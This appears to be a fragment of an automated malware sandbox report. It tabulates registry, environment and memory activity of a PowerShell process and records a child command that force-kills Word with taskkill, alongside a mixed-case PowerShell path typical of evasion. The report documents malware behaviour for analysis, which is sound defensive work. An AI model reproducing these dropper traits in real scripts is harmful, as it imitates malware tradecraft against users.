| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\mobsync.exe, file_name_orig = C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe, size = 2048 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
110 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\aETAdzjz\AppData\Roaming |
|
2 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\system32\taskkill.exe |
| Command Line | "C:\Windows\system32\taskkill.exe" /f /im winword.exe |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:23, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:13 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x5f4 |
| Parent PID | 0x2ac (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AD0
0x
B10
0x
5F8
0x
B38
0x
B34
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000060000 | 0x00060000 | 0x0015ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000160000 | 0x00160000 | 0x00161fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00170000 | 0x00173fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000190000 | 0x00190000 | 0x0020ffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x00210000 | 0x00276fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000280000 | 0x00280000 | 0x00280fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000290000 | 0x00290000 | 0x00290fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000002b0000 | 0x002b0000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002c0000 | 0x002c0000 | 0x003bffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x00547fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000550000 | 0x00550000 | 0x006d0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x01adffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001b00000 | 0x01b00000 | 0x01b7ffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x01b80000 | 0x01c3ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000001c80000 | 0x01c80000 | 0x01cfffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001d20000 | 0x01d20000 | 0x01d9ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001e30000 | 0x01e30000 | 0x01eaffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x01eb0000 | 0x0217efff | Memory Mapped File | Readable |
|
|
|
|
| user32.dll | 0x775e0000 | 0x776d9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x776e0000 | 0x777fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77800000 | 0x779a8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| taskkill.exe | 0xff2a0000 | 0xff2befff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x7fee02f0000 | 0x7fee0414fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x7fef1d30000 | 0x7fef1d7bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x7fef50d0000 | 0x7fef50defff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x7fef5240000 | 0x7fef52c5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x7fef9730000 | 0x7fef9747fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x7fefbb00000 | 0x7fefbb14fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x7fefbb20000 | 0x7fefbb2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x7fefbb30000 | 0x7fefbb45fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x7fefbec0000 | 0x7fefbed0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x7fefc910000 | 0x7fefc91bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x7fefcd40000 | 0x7fefcd86fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x7fefd040000 | 0x7fefd056fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x7fefd540000 | 0x7fefd562fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x7fefd5e0000 | 0x7fefd5eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x7fefd610000 | 0x7fefd634fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x7fefd640000 | 0x7fefd64efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x7fefd6f0000 | 0x7fefd72cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x7fefd730000 | 0x7fefd743fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x7fefd9d0000 | 0x7fefda3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x7fefdb40000 | 0x7fefdb6dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x7fefdd50000 | 0x7fefddeefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x7fefde70000 | 0x7fefdf46fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x7fefdf50000 | 0x7fefdf5dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x7fefe1c0000 | 0x7fefe3c2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x7fefe550000 | 0x7fefe5e8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x7fefe5f0000 | 0x7fefe63cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x7fefe640000 | 0x7fefe76cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x7fefe770000 | 0x7fefe7e0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x7feff710000 | 0x7feff818fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x7feff8c0000 | 0x7feff8defff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x7feff8e0000 | 0x7feff9bafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x7feff9c0000 | 0x7feff9c7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x7feff9d0000 | 0x7feffa36fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x7feffa40000 | 0x7feffb08fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| apisetschema.dll | 0x7feffb20000 | 0x7feffb20fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd9fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdefff | Private Memory | Readable, Writable |
|
|
|
|
